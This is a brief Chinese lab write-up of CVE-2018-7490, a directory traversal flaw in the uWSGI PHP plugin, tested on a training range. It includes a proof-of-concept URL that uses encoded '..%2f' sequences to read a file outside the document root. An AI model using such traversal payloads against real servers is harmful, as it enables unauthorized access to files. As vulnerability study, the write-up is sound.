CVE-2018-7490

CVE-2018-7490(目录穿越)
环境:墨者靶场(Linux)
工具:火狐Hackbar
漏洞描述
uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言。
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。
漏洞影响
uWSGI < 2.0.17
CVE-2018-7490

通过在原链接的基础上构造..%2f来访问key.txt
CVE-2018-7490

漏洞POC

http://x.x.x.x:xxxx/..%2f..%2fkey.txt

上一篇:Weblogic CVE-2020-14882 权限绕过分析


下一篇:使用namp验证SSL/TSL相关漏洞CVE-2015-2808,CVE-2013-2566,CVE-2014-3566,CVE-2016-2183,CVE-2015-4000,瞬时 Diffie-H